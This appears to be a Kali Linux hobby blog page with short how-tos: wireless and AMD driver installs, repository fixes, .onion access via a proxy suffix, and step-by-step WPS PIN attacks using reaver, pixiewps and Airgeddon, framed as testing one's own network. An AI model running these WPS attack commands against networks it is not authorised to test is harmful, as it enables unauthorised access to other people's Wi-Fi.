Skip to content

Kali

Kali Linux / Backtrack Information, How-To’s, Tips, Tools, and Guides

ALFA DRIVER INSTALL FOR KALI 2202.1 ON RASPBERRY PI 4

Open a terminal

sudo apt-get update

sudo apt-get upgrade

ifconfig

Note your wireless adapters…if any are installed

lsusb

Note the USB devices on the pi. You will not see the ALFA wifi device

Next type

sudo apt-get install realtek-rtl88xxau-dkms

Drivers will install, this may take a few minutes.

Once it is done type the following

lsusb

You will now see the Realtek Adapter

ifconfig

You will now see your ALFA wireless card

ACCESSING .ONION SITES WITHOUT TOR

While TOR is the recommended way to access the dark web, everyone and anyone can still visit without the same level of anonymity. I certainly would suggest using TOR always, however if you need to get to any .onion site from a computer without tor, you can do so by following this:

Open an internet browser (Edge, Firefox, Chrome, etc)
Type in the .onion site (ex. https://protonirockerxow.onion/rc/)
After the .onion portion of the address, add .dog (ex https://protonirockerxow.onion.dog/rc/)
Press Enter
You are now viewing RISEUP’s website on the darkweb, using a regular browser


Installing RX 480 Nitro Drivers in Kali

  • Kali

Navigating Around the Unsupported OS Issue for the AMD Drivers

On your Kali box, you will want to go to the AMD Driver download page for the RX 480 Cards

Once there you will want to download the UBUNTU Drivers

After the download completes, open a Terminal

Navigate to the directory where you downloaded the drivers and type

tar -xJvf amd(AND THE REST OF THE NAME OF THE FILE)

cd to the amd driver directory

nano amdgpu-pro-install

ctrl +w and search for ubuntu

After the ubuntu | linuxmint | debian text, insert | kali

So the line will look like
ubuntu | linuxmint | debian | kali

Save the file and exit

Type the following to install the drivers, and it should go through now. If you encounter any errors, you may need to repair and reinstall the drivers

./amdgpu-pro-install -y –opencl=legacy

KALI – Unable to Locate Package

  • Kali

How-To Ensure Your Repos Are Correct

sudo nano /etc/apt/sources.list

Add the following if they are not already in the file:

deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

Save and Exit the File

sudo apt-get update

Your packages should now be available

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone https://github.com/t6x/reaver-wps-fork-t6x

cd reaver-wps-fork-t6x/
cd src/
./configure
make
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

cd airgeddon

ls

sudo bash

./airgeddon.sh

apt-get install and name of tool thats missing

After the dependencies are all installed, run ./airgeddon.sh and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz

Testing and Securing Against a WPS Attack

How To Check If You Are Vulnerable, and Then Secure Your Network

First you will want to download and install reaver, wash and airmon-ng.  If you are running Kali or Parrot, it is already there.  You will also need a wireless adapter that is capable of packet injection.  Assuming you have those, you will want to open a terminal and run the following

sudo bash

ifconfig

Note which adapter is your wireless card, that is capable of packet injection.  For the rest of this, lets assume it is wlan0.

airmon-ng check kill

wash -i wlan0

Note the BSSID of your Wireless Access Point / Wireless Router

reaver -i wlan0 -b MacAddressOfMyRouter -vv 

After some time my router/ap gave up the ghost.  It showed my WPS pin.  I am running a wireless router with a Broadcom chip, which is susceptible.

To fix this, I had to log into my wireless router, navigate to the WPS settings, and I changed it from Enabled to Disabled.  I saved the settings, and voila…I haven’t been able to crack the WPS pin again